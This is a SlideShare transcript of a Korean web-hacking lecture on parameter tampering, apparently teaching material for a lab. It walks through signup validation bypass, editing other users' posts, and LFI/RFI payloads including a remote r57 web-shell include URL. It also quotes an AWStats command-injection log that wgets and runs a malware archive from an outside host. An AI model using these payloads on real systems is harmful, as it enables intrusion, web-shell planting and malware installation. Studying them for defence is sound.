์ฐธ๊ณ ๋ฌธํ—Œ โ€ข http://fehead.tistory.com/201 โ€ข http://cafe.naver.com/sec/13325 โ€ข http://www.boannews.com/media/view.asp?idx=45812 โ€ข ์›น ๋ชจ์˜ํ•ดํ‚น๊ณผ ์‹œํ์–ด ์ฝ”๋”ฉ ์ง„๋‹จ ๊ฐ€์ด๋“œ ์ตœ๊ฒฝ์ฒ  ์™ธ ์ง€์Œ E-mail: isc0304@naver.com Writing by Ilsun Choi 49

More Related Content

PPTX
Error Expose
Ilsun Choi
ย 
PPTX
Exposure Information
Ilsun Choi
ย 
PDF
05 pe ํ—ค๋”(pe header)
Ilsun Choi
ย 
PDF
Log parser&webshell detection
Ilsun Choi
ย 
PDF
Directory lists
Ilsun Choi
ย 
PPTX
05 pe ํ—ค๋”(pe header)
Ilsun Choi
ย 
PDF
comparing Shell dectector and NeoPI
Ilsun Choi
ย 
PPTX
Google Hacking
Ilsun Choi
ย 
Error Expose
Ilsun Choi
ย 
Exposure Information
Ilsun Choi
ย 
05 pe ํ—ค๋”(pe header)
Ilsun Choi
ย 
Log parser&webshell detection
Ilsun Choi
ย 
Directory lists
Ilsun Choi
ย 
05 pe ํ—ค๋”(pe header)
Ilsun Choi
ย 
comparing Shell dectector and NeoPI
Ilsun Choi
ย 
Google Hacking
Ilsun Choi
ย 

Viewers also liked (20)

PDF
Le piattaforme per il social business
piero itta
ย 
PDF
Prezi #hotelvertrieb#ecommerce#SEO_2021
Ansgar Jahns
ย 
PDF
M Power
Chris Direduryan
ย 
PDF
PHP
andreluizlc
ย 
PDF
Domanda protocollata
noicattaroweb
ย 
PDF
Cyberfolio 2007 - Lean.Joy
Leandro Rangel
ย 
PDF
PHP SuperGlobals - Supersized Trouble
Imperva
ย 
PPTX
Digital Media & Learning Conference Talk: Kids Teaching Kids Web Design at a ...
Jacqueline Vickery
ย 
PPTX
La posta elettronica certificata (PEC)
Salvatore Cordiano
ย 
PPTX
Sunny on Foody
mrp4
ย 
PPTX
Formazione formatori
stefano preto
ย 
PDF
Quick Wins
HighLoad2009
ย 
PPT
Intestazione
rifugiati
ย 
PDF
Wordpress Security Optimization (Basic)
Irvan R-ID
ย 
PPT
L1 seeingthings
Boat Dock
ย 
PDF
Digital Media & Youth Safety - Ricky Lewis & Jacqueline Vickery
Jacqueline Vickery
ย 
PPT
O meio ambiente acustico.97
Priscila Silveira Prado
ย 
PPT
Thanks A Lot
Karen C
ย 
PPTX
A+ student strategies final
Northeast Center, Office of Academic Support, SUNY Empire State College
ย 
PDF
Sharding Architectures
guest0e6d5e
ย 
Le piattaforme per il social business
piero itta
ย 
Prezi #hotelvertrieb#ecommerce#SEO_2021
Ansgar Jahns
ย 
M Power
Chris Direduryan
ย 
PHP
andreluizlc
ย 
Domanda protocollata
noicattaroweb
ย 
Cyberfolio 2007 - Lean.Joy
Leandro Rangel
ย 
PHP SuperGlobals - Supersized Trouble
Imperva
ย 
Digital Media & Learning Conference Talk: Kids Teaching Kids Web Design at a ...
Jacqueline Vickery
ย 
La posta elettronica certificata (PEC)
Salvatore Cordiano
ย 
Sunny on Foody
mrp4
ย 
Formazione formatori
stefano preto
ย 
Quick Wins
HighLoad2009
ย 
Intestazione
rifugiati
ย 
Wordpress Security Optimization (Basic)
Irvan R-ID
ย 
L1 seeingthings
Boat Dock
ย 
Digital Media & Youth Safety - Ricky Lewis & Jacqueline Vickery
Jacqueline Vickery
ย 
O meio ambiente acustico.97
Priscila Silveira Prado
ย 
Thanks A Lot
Karen C
ย 
A+ student strategies final
Northeast Center, Office of Academic Support, SUNY Empire State College
ย 
Sharding Architectures
guest0e6d5e
ย 
Ad

Similar to parameter tampering (20)

PDF
bofแ„€แ…ตแ„Žแ…ฉ+rtl+fake_ebp
one_two_12
ย 
PDF
(130511) #fitalk utilization of ioc, ioaf and sig base
INSIGHT FORENSIC
ย 
PPTX
[Devfest Campus Korea 2021]๋ณด์•ˆ๊ณผ ํ•จ๊ป˜ ํ•˜๋Š” ๊ฐœ๋ฐœ, ์‹œํ์–ด์ฝ”๋”ฉ
GDGCampusKorea
ย 
PDF
(Ficon2016) #2 ์นจํ•ด์‚ฌ๊ณ  ๋Œ€์‘, ์ด๋ ‡๋‹ค๊ณ  ์ „ํ•ด๋ผ
INSIGHT FORENSIC
ย 
PDF
แ„แ…ณแ†ฏแ„…แ…กแ„‹แ…ฎแ„ƒแ…ณ ํ”Œ๋ ˆ์–ด 101
Jinseok Oh
ย 
PDF
[์ปจํŠธ๋ฆฌ๋ทฐํ†ค 2020] ๋ฆฌ๋ธŒ๋ ˆ์˜คํ”ผ์Šค(LibreOffice)์˜ QA ๋ฐ ์†Œ์Šค ์ฝ”๋“œ ๋ฆฌ๋ทฐ
DaeHyun Sung
ย 
PDF
UNIX ์‹œ์Šคํ…œ 2014-2018๋…„ ๊ธฐ๋ง์‹œํ—˜ ๊ธฐ์ถœ๋ฌธ์ œ
Lee Sang-Ho
ย 
PPTX
XECon2015 :: [2-1] ์ •๊ด‘์„ญ - ์ฒ˜์Œ ์‹œ์ž‘ํ•˜๋Š” laravel
XpressEngine
ย 
PPTX
์ฒ˜์Œ ์‹œ์ž‘ํ•˜๋Š” ๋ผ๋ผ๋ฒจ
KwangSeob Jeong
ย 
PDF
Nodejs๋ฅผ ์ด์šฉํ•œ ๊ฐœ๋ฐœ
WebFrameworks
ย 
PDF
[แ„‡แ…กแ†ฏแ„‘แ…ญแ„Œแ…กแ„…แ…ญ] AWS แ„แ…ณแ†ฏแ„…แ…กแ„‹แ…ฎแ„ƒแ…ณ แ„‹แ…ตแ†ซแ„‘แ…ณแ„…แ…ก BDFDoor แ„ƒแ…ขแ„‹แ…ณแ†ผ แ„‡แ…กแ†ผแ„‹แ…กแ†ซ.pdf
ssuserf8b8bd1
ย 
PDF
[2014 CodeEngn Conference 10] ์‹ฌ์ค€๋ณด - ๊ธ‰์ „์ด ํ•„์š”ํ•ฉ๋‹ˆ๋‹ค
Code Engn
ย 
PDF
[232] แ„‰แ…ฅแ†ผแ„‚แ…ณแ†ผแ„‹แ…ฅแ„ƒแ…ตแ„แ…กแ„Œแ…ตแ„Œแ…ฑแ„‹แ…ฅแ„แ…กแ„‡แ…ชแ†ปแ„‚แ…ต แ„‰แ…ฉแ†ผแ„แ…ขแ„‹แ…ฎแ†ผ
NAVER D2
ย 
PDF
ํ•ด์ปค๊ฐ€ ๋˜๊ณ  ์‹ถ์€ ์ž๋Š” ๋‚˜์—๊ฒŒ... ์ •๋ณด๋ณด์•ˆ ์ž…๋ฌธ๊ณผ ๊ธธ ์ฐพ๊ธฐ
J J
ย 
PDF
XECon2015 :: [1-1] ์•ˆ์ •์ˆ˜ - XE3 ๊ตฌ์กฐ ๋ฐ ๊ธฐ๋ณธ๊ธฐ
XpressEngine
ย 
PPTX
Python study 1๊ฐ• (์˜คํ”ˆ์†Œ์Šค์ปจ์„คํŒ… ๋‚ด๋ถ€ ๊ฐ•์˜)
์ •๋ช…ํ›ˆ Jerry Jeong
ย 
PDF
Postman๊ณผ Newman์„ ์ด์šฉํ•œ RestAPI ํ…Œ์ŠคํŠธ ์ž๋™ํ™” ๊ฐ€์ด๋“œ
SangIn Choung
ย 
PDF
แ„Œแ…ตแ„‚แ…ณแ†ผแ„’แ…งแ†ผแ„Œแ…ตแ„‰แ…ฉแ†จแ„‹แ…ฑแ„’แ…งแ†ธแ„€แ…ฉแ†ผแ„€แ…งแ†จ แ„Žแ…ฌแ„‰แ…ตแ†ซแ„ƒแ…ฉแ†ผแ„’แ…ฃแ†ผ แ„‡แ…ฎแ†ซแ„‰แ…ฅแ†จ
ํ•œ์ต ์ฃผ
ย 
PDF
Hoons๋‹ท๋„ท ์ขŒ์ถฉ์šฐ๋Œ 10๋…„, ๊ทธ๋ฆฌ๊ณ  ์ƒˆ๋กœ์šด ํŒจ๋Ÿฌ๋‹ค์ž„
KH Park (๋ฐ•๊ฒฝํ›ˆ)
ย 
PPTX
Google Protocol buffer
knight1128
ย 
bofแ„€แ…ตแ„Žแ…ฉ+rtl+fake_ebp
one_two_12
ย 
(130511) #fitalk utilization of ioc, ioaf and sig base
INSIGHT FORENSIC
ย 
[Devfest Campus Korea 2021]๋ณด์•ˆ๊ณผ ํ•จ๊ป˜ ํ•˜๋Š” ๊ฐœ๋ฐœ, ์‹œํ์–ด์ฝ”๋”ฉ
GDGCampusKorea
ย 
(Ficon2016) #2 ์นจํ•ด์‚ฌ๊ณ  ๋Œ€์‘, ์ด๋ ‡๋‹ค๊ณ  ์ „ํ•ด๋ผ
INSIGHT FORENSIC
ย 
แ„แ…ณแ†ฏแ„…แ…กแ„‹แ…ฎแ„ƒแ…ณ ํ”Œ๋ ˆ์–ด 101
Jinseok Oh
ย 
[์ปจํŠธ๋ฆฌ๋ทฐํ†ค 2020] ๋ฆฌ๋ธŒ๋ ˆ์˜คํ”ผ์Šค(LibreOffice)์˜ QA ๋ฐ ์†Œ์Šค ์ฝ”๋“œ ๋ฆฌ๋ทฐ
DaeHyun Sung
ย 
UNIX ์‹œ์Šคํ…œ 2014-2018๋…„ ๊ธฐ๋ง์‹œํ—˜ ๊ธฐ์ถœ๋ฌธ์ œ
Lee Sang-Ho
ย 
XECon2015 :: [2-1] ์ •๊ด‘์„ญ - ์ฒ˜์Œ ์‹œ์ž‘ํ•˜๋Š” laravel
XpressEngine
ย 
์ฒ˜์Œ ์‹œ์ž‘ํ•˜๋Š” ๋ผ๋ผ๋ฒจ
KwangSeob Jeong
ย 
Nodejs๋ฅผ ์ด์šฉํ•œ ๊ฐœ๋ฐœ
WebFrameworks
ย 
[แ„‡แ…กแ†ฏแ„‘แ…ญแ„Œแ…กแ„…แ…ญ] AWS แ„แ…ณแ†ฏแ„…แ…กแ„‹แ…ฎแ„ƒแ…ณ แ„‹แ…ตแ†ซแ„‘แ…ณแ„…แ…ก BDFDoor แ„ƒแ…ขแ„‹แ…ณแ†ผ แ„‡แ…กแ†ผแ„‹แ…กแ†ซ.pdf
ssuserf8b8bd1
ย 
[2014 CodeEngn Conference 10] ์‹ฌ์ค€๋ณด - ๊ธ‰์ „์ด ํ•„์š”ํ•ฉ๋‹ˆ๋‹ค
Code Engn
ย 
[232] แ„‰แ…ฅแ†ผแ„‚แ…ณแ†ผแ„‹แ…ฅแ„ƒแ…ตแ„แ…กแ„Œแ…ตแ„Œแ…ฑแ„‹แ…ฅแ„แ…กแ„‡แ…ชแ†ปแ„‚แ…ต แ„‰แ…ฉแ†ผแ„แ…ขแ„‹แ…ฎแ†ผ
NAVER D2
ย 
ํ•ด์ปค๊ฐ€ ๋˜๊ณ  ์‹ถ์€ ์ž๋Š” ๋‚˜์—๊ฒŒ... ์ •๋ณด๋ณด์•ˆ ์ž…๋ฌธ๊ณผ ๊ธธ ์ฐพ๊ธฐ
J J
ย 
XECon2015 :: [1-1] ์•ˆ์ •์ˆ˜ - XE3 ๊ตฌ์กฐ ๋ฐ ๊ธฐ๋ณธ๊ธฐ
XpressEngine
ย 
Python study 1๊ฐ• (์˜คํ”ˆ์†Œ์Šค์ปจ์„คํŒ… ๋‚ด๋ถ€ ๊ฐ•์˜)
์ •๋ช…ํ›ˆ Jerry Jeong
ย 
Postman๊ณผ Newman์„ ์ด์šฉํ•œ RestAPI ํ…Œ์ŠคํŠธ ์ž๋™ํ™” ๊ฐ€์ด๋“œ
SangIn Choung
ย 
แ„Œแ…ตแ„‚แ…ณแ†ผแ„’แ…งแ†ผแ„Œแ…ตแ„‰แ…ฉแ†จแ„‹แ…ฑแ„’แ…งแ†ธแ„€แ…ฉแ†ผแ„€แ…งแ†จ แ„Žแ…ฌแ„‰แ…ตแ†ซแ„ƒแ…ฉแ†ผแ„’แ…ฃแ†ผ แ„‡แ…ฎแ†ซแ„‰แ…ฅแ†จ
ํ•œ์ต ์ฃผ
ย 
Hoons๋‹ท๋„ท ์ขŒ์ถฉ์šฐ๋Œ 10๋…„, ๊ทธ๋ฆฌ๊ณ  ์ƒˆ๋กœ์šด ํŒจ๋Ÿฌ๋‹ค์ž„
KH Park (๋ฐ•๊ฒฝํ›ˆ)
ย 
Google Protocol buffer
knight1128
ย 
Ad

parameter tampering

  • 1. ํŒŒ๋ผ๋ฏธํ„ฐ ๋ณ€์กฐ ์ทจ์•ฝ์  9์ฃผ์ฐจ ํŒŒ๋ผ๋ฏธํ„ฐ ๋ณ€์กฐ ์ทจ์•ฝ์  ์ตœ์ผ์„  1E-mail: isc0304@naver.com Writing by Ilsun Choi
  • 2. Index 1. ๊ฐœ์š” 2. ์‚ฌ๋ก€๋ถ„์„ 1) ํšŒ์›๊ฐ€์ž… 2) ํƒ€์ธ ๊ธ€ ์ˆ˜์ • ๋ฐ ์‚ญ์ œํ•˜๊ธฐ 3) ์ž๋ฐ”์Šคํฌ๋ฆฝํŠธ๋กœ ๊ตฌ์„ฑ๋œ ์ˆ˜์ •/์‚ญ์ œํŽ˜์ด์ง€ ์ •๋ณด ๋…ธ์ถœ 4) ํŒŒ์ผ ์‚ฝ์ž…(LFI/RFI) 5) ๋ช…๋ น์–ด ์‚ฝ์ž… 6) URL Redirection 3. ๋ชจ์˜์‹ค์Šต 1) ๋ช…๋ น์–ด ์‚ฝ์ž… ์ทจ์•ฝ์  ํƒ์ง€ 2) ๋ฒ„ํผ์˜ค๋ฒ„ํ”Œ๋กœ์šฐ ์ ๊ฒ€ ๋ถ€๋ก. Direct RET BOF 2E-mail: isc0304@naver.com Writing by Ilsun Choi
  • 3. 1. ๊ฐœ์š” 3 ์–ดํ”Œ๋ฆฌ์ผ€์ด์…˜์—์„œ ์‚ฌ์šฉ๋˜๋Š” ์ •๋ณด ์‚ฌ์šฉ์ž ์ž…๋ ฅํผ Query String HTTP ํ—ค๋” ๊ธฐํƒ€ ๋ช…๋ น์–ด ์‚ฝ์ž… ์›๊ฒฉ์ง€ ํŒŒ์ผ ์‚ฝ์ž… ํƒ€์ธ๊ธ€ ์ˆ˜์ •/์‚ญ์ œ ๋ณ€์กฐ E-mail: isc0304@naver.com Writing by Ilsun Choi
  • 4. 2. ์‚ฌ๋ก€๋ถ„์„ 1) ํšŒ์›๊ฐ€์ž… 2) ํƒ€์ธ ๊ธ€ ์ˆ˜์ • ๋ฐ ์‚ญ์ œํ•˜๊ธฐ 3) ์ž๋ฐ”์Šคํฌ๋ฆฝํŠธ๋กœ ๊ตฌ์„ฑ๋œ ์ˆ˜์ •/์‚ญ์ œํŽ˜์ด์ง€ ์ •๋ณด ๋…ธ์ถœ 4) ํŒŒ์ผ ์‚ฝ์ž…(LFI/RFI) 5) ๋ช…๋ น์–ด ์‚ฝ์ž… 6) URL Redirection 4E-mail: isc0304@naver.com Writing by Ilsun Choi
  • 5. 2. ์‚ฌ๋ก€๋ถ„์„ > 1) ํšŒ์›๊ฐ€์ž… โ€ข ์ž…๋ ฅ ๊ฐ’ ๊ฒ€์ฆ์„ ์œ„ํ•œ ์ž๋ฐ”์Šคํฌ๋ฆฝํŠธ โ€ข ์ž๋ฐ”์Šคํฌ๋ฆฝํŠธ์˜ ์˜ˆ โ€ข ๋น„๊ณต๊ฐœ test site๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ์‹ค์Šตํ•œ ๋‚ด์šฉ์„ ์ •๋ฆฌํ•˜์˜€๋‹ค. 5 if ( a!= b ){ alert(โ€œno hackโ€); location.href = โ€œ/โ€; } E-mail: isc0304@naver.com Writing by Ilsun Choi
  • 6. 2. ์‚ฌ๋ก€๋ถ„์„ > 1) ํšŒ์›๊ฐ€์ž… 1) ์ฃผ๋ฏผ๋“ฑ๋ก๋ฒˆํ˜ธ ์ธ์ฆ ์šฐํšŒ 6E-mail: isc0304@naver.com Writing by Ilsun Choi
  • 7. โ€ข ์ฃผ๋ฏผ๋“ฑ๋ก๋ฒˆํ˜ธ ์ฒดํฌ ๋กœ์ง์„ ์ฐพ์•„ ์‚ญ์ œ 2. ์‚ฌ๋ก€๋ถ„์„ > 1) ํšŒ์›๊ฐ€์ž… 7E-mail: isc0304@naver.com Writing by Ilsun Choi
  • 8. โ€ข ์กด์žฌํ•˜์ง€ ์•Š๋Š” ์ฃผ๋ฏผ๋“ฑ๋ก๋ฒˆํ˜ธ๋ฅผ ๊ธฐ์ž…ํ•˜์—ฌ ์šฐํšŒ์— ์„ฑ๊ณต 2. ์‚ฌ๋ก€๋ถ„์„ > 1) ํšŒ์›๊ฐ€์ž… 8E-mail: isc0304@naver.com Writing by Ilsun Choi
  • 9. 2. ์‚ฌ๋ก€๋ถ„์„ > 1) ํšŒ์›๊ฐ€์ž… โ€ข ์ฃผ์†Œ์ฐพ๊ธฐ ์„œ๋น„์Šค ์šฐํšŒ โ€ข ํ…Œ์ŠคํŠธ ์„œ๋ฒ„์ด๊ธฐ ๋•Œ๋ฌธ์— ์ฃผ์†Œ์ฐพ๊ธฐ ์„œ๋น„ ์Šค๊ฐ€ ์กด์žฌํ•˜์ง€ ์•Š๋Š”๋‹ค. 9E-mail: isc0304@naver.com Writing by Ilsun Choi
  • 10. โ€ข ์„ฑ๊ณต์ ์œผ๋กœ ํšŒ์›๊ฐ€์ž…์— ์„ฑ๊ณตํ•œ ๊ฒƒ์„ ๋ณผ ์ˆ˜ ์žˆ๋‹ค. 10 2. ์‚ฌ๋ก€๋ถ„์„ > 1) ํšŒ์›๊ฐ€์ž… E-mail: isc0304@naver.com Writing by Ilsun Choi
  • 11. 2. ์‚ฌ๋ก€๋ถ„์„ > 2) ํƒ€์ธ ๊ธ€ ์ˆ˜์ • ๋ฐ ์‚ญ์ œ 7.1.1 ํƒ€์ธ ๋น„๋ฐ€ ๊ธ€ ๋ณด๊ธฐ์™€ ์œ ์‚ฌ ๋จผ์ € ์šฐ๋ฆฌ๊ฐ€ ์ด์šฉํ•  ์ˆ˜ ์žˆ๋Š” ๊ฒŒ์‹œ๋ฌผ ์ƒ์„ฑ 11E-mail: isc0304@naver.com Writing by Ilsun Choi
  • 12. โ€ข ๋‚ด๊ฐ€ ์“ด ๊ธ€ ์ˆ˜์ • ํŽ˜์ด์ง€ ์—ด๊ธฐ 12 2. ์‚ฌ๋ก€๋ถ„์„ > 2) ํƒ€์ธ ๊ธ€ ์ˆ˜์ • ๋ฐ ์‚ญ์ œ E-mail: isc0304@naver.com Writing by Ilsun Choi
  • 13. โ€ข ํŽ˜์ด์ง€ ์š”์ฒญ์—์„œ 18๋ฒˆ ๊ฒŒ ์‹œ๊ธ€ ๋ณ€๊ฒฝ์„ ์š”์ฒญํ•˜๊ณ  ์žˆ๋‹ค ๋Š” ๊ฒƒ์„ ํ™•์ธ โ€ข 15๋ฒˆ ๊ฒŒ์‹œ๊ธ€์„ ๋ฐ”๊พธ๊ธฐ ์œ„ ํ•ด ๋ณ€์กฐํ•˜์—ฌ ์ง„ํ–‰ 13 2. ์‚ฌ๋ก€๋ถ„์„ > 2) ํƒ€์ธ ๊ธ€ ์ˆ˜์ • ๋ฐ ์‚ญ์ œ E-mail: isc0304@naver.com Writing by Ilsun Choi
  • 14. โ€ข ์ˆ˜์ • ํ›„ โ€ข ์‚ญ์ œ ํ›„ 14 2. ์‚ฌ๋ก€๋ถ„์„ > ํƒ€์ธ ๊ธ€ ์ˆ˜์ • ๋ฐ ์‚ญ์ œ E-mail: isc0304@naver.com Writing by Ilsun Choi
  • 15. 2. ์‚ฌ๋ก€๋ถ„์„ > 3) ์ž๋ฐ”์Šคํฌ๋ฆฝํŠธ, ์ˆ˜์ • ์‚ญ์ œ ํŽ˜์ด์ง€ ๋…ธ์ถœ 15 โ€ข ์‚ญ์ œ๊ฑฐ๋‚˜ ์ˆ˜์ •ํ•  ์ˆ˜ ์žˆ๋Š” ํŽ˜์ด์ง€๋ฅผ ์š”์ฒญํ•˜๋Š” ํ˜•์‹ โ€ข javascript ๋‚ด์— ์ˆ˜์ •/์‚ญ์ œ ํŽ˜์ด์ง€ ํ™•์ธ ๊ฐ€๋Šฅ E-mail: isc0304@naver.com Writing by Ilsun Choi
  • 16. 2. ์‚ฌ๋ก€๋ถ„์„ > 4) ํŒŒ์ผ์‚ฝ์ž…(LFI/RFI) โ€ข RFI: Remote File Inclusion ์™ธ๋ถ€์— ์žˆ๋Š” ์„œ๋ฒ„๋กœ๋ถ€ํ„ฐ ํŒŒ์ผ์„ ์ฒจ๋ถ€ ๋ฐ›์Œ -> ์ทจ์•ฝํ•œ ๋กœ์ง(์›น์‰˜๊ณผ ๊ฐ™์€)์„ ๊ฐ€์ ธ์˜ค๊ธฐ ์œ„ํ•จ โ€ข LFI: Local File Inclusion ์„œ๋ฒ„๋‚ด๋ถ€๋กœ๋ถ€ํ„ฐ ํŒŒ์ผ์„ ์ฒจ๋ถ€ ๋ฐ›์Œ -> ๋ฏผ๊ฐํ•œ ๋ฐ์ดํ„ฐ ๋…ธ์ถœ(์‹œ์Šคํ…œ ํŒŒ์ผ ๋“ฑ)์„ ์œ„ํ•จ 16E-mail: isc0304@naver.com Writing by Ilsun Choi
  • 17. โ€ข Default๋Š” Off โ€ข ๊ฐœ๋ฐœ์ž์˜ ํ•„์š”์— ์˜ํ•ด์„œ On์ด ๋  ์ˆ˜ ์žˆ์Œ. 17E-mail: isc0304@naver.com Writing by Ilsun Choi 2. ์‚ฌ๋ก€๋ถ„์„ > 4) ํŒŒ์ผ์‚ฝ์ž…(LFI/RFI)
  • 18. LFI ์‚ฌ๋ก€ 1 โ€ข ํŒŒ๋ผ๋ฏธํ„ฐ ๊ฐ’์— ์‹œ์Šคํ…œ ํŒŒ์ผ ๋“ฑ์˜ ๊ฒฝ๋กœ๋ฅผ ์‚ฝ์ž… (๋‹ค์šด๋กœ๋“œ ์ทจ์•ฝ์ ๊ณผ ์œ ์‚ฌ) โ€ข ์•„๋ž˜์™€ ๊ฐ™์€ ํ™•์žฅ์ž๋ฅผ ๋ถ™์ด๋Š” ํ˜•์‹ ๏ƒ  ๋„๋ฐ”์ดํŠธ ์ธ์ ์…˜์„ ์‚ฌ์šฉ 18 ๊ตฌ๋ถ„ ํŒŒ๋ผ๋ฏธํ„ฐ ์›๋ณธ file=php(๋‚ด๋ถ€์ ์œผ๋กœ .abc๊ฐ€ ๋ถ™์–ด, php.abc๋ฅผ ํ˜ธ์ถœ ๋ณ€์กฐ file=../../../../../../etc/passwd%00 ๊ตฌ๋ถ„ ์ทจ์•ฝํ•œ ํ•จ์ˆ˜ php์–ธ์–ด require(),include(),eval(),passthru(),system(),fopen() ๋“ฑ E-mail: isc0304@naver.com Writing by Ilsun Choi 2. ์‚ฌ๋ก€๋ถ„์„ > 4) ํŒŒ์ผ์‚ฝ์ž…(LFI/RFI)
  • 19. LFI ์‚ฌ๋ก€ 2 โ€ข ์ œ๋กœ๋ณด๋“œ(xe)์˜ /include/write.php ์—์„œ ๋ฐœ์ƒ๋œ LFI ์ทจ์•ฝ์  โ€ข โ€œ://โ€ ์™€ โ€œ..โ€ ๋งŒ์„ ํ•„ํ„ฐ๋งํ•˜๊ธฐ ๋•Œ๋ฌธ์— ๋‹ค์Œ๊ณผ ๊ฐ™์€ ๊ฒฝ๋กœ๋Š” ์‚ฝ์ž… ๊ฐ€๋Šฅ c:windowssystem32driveretchosts 19E-mail: isc0304@naver.com Writing by Ilsun Choi 2. ์‚ฌ๋ก€๋ถ„์„ > 4) ํŒŒ์ผ์‚ฝ์ž…(LFI/RFI)
  • 20. RFI ์‚ฌ๋ก€ 1 โ€ข ์›๊ฒฉ์ง€์— ์žˆ๋Š” txtํŒŒ์ผ ๏ƒ  ์„œ๋ฒ„ ๋‚ด๋ถ€์—์„œ php๋กœ ์‹คํ–‰ 1. null.php ์‹คํ–‰ 2. include๋กœ test.txt ํŒŒ์ผ ์ฝ”๋“œ๋ฅผ ๋ถˆ๋Ÿฌ์˜ด 3. null.php๊ฐ€ ๋ถˆ๋Ÿฌ์˜จ ์ฝ”๋“œ๋ฅผ ์‹คํ–‰ 20 ์‹คํ–‰์ˆœ์„œ 1. 2. 3. E-mail: isc0304@naver.com Writing by Ilsun Choi 2. ์‚ฌ๋ก€๋ถ„์„ > 4) ํŒŒ์ผ์‚ฝ์ž…(LFI/RFI)
  • 21. โ€ข ์‰˜ ์ฝ”๋“œ ์ฃผ์†Œ โ€ข http://www.r57shell.net/shell/r57.txt 21E-mail: isc0304@naver.com Writing by Ilsun Choi 2. ์‚ฌ๋ก€๋ถ„์„ > 4) ํŒŒ์ผ์‚ฝ์ž…(LFI/RFI)
  • 22. โ€ข http://192.168.157.130/9ch/null.php?file=http:// www.r57shell.net/shell/r57.txt %00 โ€ข ์ด์ „ ์‚ฌ๋ก€์™€ ๋™์ผํ•œ ๋ฐฉ์‹์œผ๋กœ txt ํŒŒ์ผ์„ ๋ถˆ๋Ÿฌ๋“ค ์—ฌ ์‹คํ–‰ํ•จ. 22E-mail: isc0304@naver.com Writing by Ilsun Choi 2. ์‚ฌ๋ก€๋ถ„์„ > 4) ํŒŒ์ผ์‚ฝ์ž…(LFI/RFI)
  • 23. 23 RFI ์‚ฌ๋ก€ 2 โ€ข โ€œ://โ€์„ ํ•„ํ„ฐ๋งํ•˜์—ฌ ์‚ฌ๋ก€(1)๊ณผ ๊ฐ™์€ ์ทจ์•ฝ์ ์„ ๋ฐœ์ƒํ•˜์ง€ ์•Š๋Š”๋‹ค. โ€ข ๊ทธ๋Ÿฌ๋‚˜, base64๋กœ ์ธ์ฝ”๋”ฉ๋œ phpinfo()์„ ์‚ฝ์ž…ํ•˜๋ฉด php.ini ํŒŒ์ผ ์ •๋ณด๋ฅผ ํ™•์ธํ•  ์ˆ˜ ์žˆ๋‹ค. ๏ƒ  ์ถ”๊ฐ€์ ์ธ ์ทจ์•ฝ์  ๋…ธ์ถœ ๊ฐ€๋Šฅ์„ฑ E-mail: isc0304@naver.com Writing by Ilsun Choi 2. ์‚ฌ๋ก€๋ถ„์„ > 4) ํŒŒ์ผ์‚ฝ์ž…(LFI/RFI)
  • 24. โ€ข http://192.168.157.130/9ch/null.php?file=data:;base64,PD9waHBpbmZvKCk/PiUwMA== โ€ข ์‚ฝ์ž…๋œ base64 ์ฝ”๋“œ : <?phpinfo()?>%00 24E-mail: isc0304@naver.com Writing by Ilsun Choi 2. ์‚ฌ๋ก€๋ถ„์„ > 4) ํŒŒ์ผ์‚ฝ์ž…(LFI/RFI)
  • 25. 25 โ€ข ์ทจ์•ฝํ•  ์ˆ˜ ์žˆ๋Š” php.ini ์„ค์ • ๋ชฉ๋ก โ€ป ์ž์„ธํ•œ ๋‚ด์šฉ์€ ๊ต์žฌ p288 ํ™•์ธํ•˜๋ฉด ๋œ๋‹ค. ์„ค์ •์ •๋ณด ๊ถŒ์žฅ ๊ฐ’ ์„ค์ •์ •๋ณด ๊ถŒ์žฅ ๊ฐ’ register_globals Off magic_quotes_sybase Off safe_mode On open_basedir ๋””๋ ‰ํ„ฐ๋ฆฌ safe_mode_gid Off safe_mode_exec_dir ๋””๋ ‰ํ„ฐ๋ฆฌ expose_php Off display_errors Off file_uploads Off log_errors On allow_url_fopen Off error_log ํŒŒ์ผ๋ช… magic_quotes_gpc On E-mail: isc0304@naver.com Writing by Ilsun Choi 2. ์‚ฌ๋ก€๋ถ„์„ > 4) ํŒŒ์ผ์‚ฝ์ž…(LFI/RFI)
  • 26. 2. ์‚ฌ๋ก€๋ถ„์„ > 5) ๋ช…๋ น์–ด ์‚ฝ์ž… 1) PHP exec ํ•จ์ˆ˜ ๋ง˜๋ณด(Mambo) ์–ดํ”Œ๋ฆฌ์ผ€์ด์…˜ ์ทจ์•ฝ์  26 mkidr E-mail: isc0304@naver.com Writing by Ilsun Choi
  • 27. 2) open() ํ•จ์ˆ˜ AWStats ์–ดํ”Œ๋ฆฌ์ผ€์ด์…˜์˜ awstats.pl ํŽ˜์ด์ง€ ์ทจ์•ฝ์  ๊ณต๊ฒฉ ๋กœ๊ทธ 1. id ๋ช…๋ น์–ด๋กœ ๊ณ„์ •๊ถŒํ•œ ํ™•์ธ 2. ์›๊ฒฉ์ง€ ํŒŒ์ผ(aw.tgz)๋ฅผ ๊ฐ€์ ธ์™€ ์•…์„ฑํ”„๋กœ๊ทธ๋žจ ์‹คํ–‰(inetd) 27 1 66.99.250.98 - - [24/Feb/2005:02:20:45 -0500] โ€œGET //cgi-bin/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1โ€404 1051 โ€œ-โ€ โ€œmozilla./4.0 (compatible; MSIE 6.0; Windows 98)โ€ 2 213.135.2.227 - - [26/Feb/2005:14:13:38 -0500] โ€œGET /cgibin/awstats.pl? configdir=%20%7c%20cd%20%2ftmp%3bwget%20www.shady.go.ro%2faw.tgz%3b%20tar%20zx... HTTP1.1โ€200 410 โ€œ-โ€ โ€œMozilla/4.0(compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)โ€ 2๋ฒˆ ๋‚ด์šฉ ๋””์ฝ”๋”ฉ configdir= | cd /tmp; wget www.shandy.go.ro/aw.tgz; tar zxf aw.tgz; rm โ€“f aw.tgz; cd aw; ./inetd | E-mail: isc0304@naver.com Writing by Ilsun Choi 2. ์‚ฌ๋ก€๋ถ„์„ > 5) ๋ช…๋ น์–ด ์‚ฝ์ž…
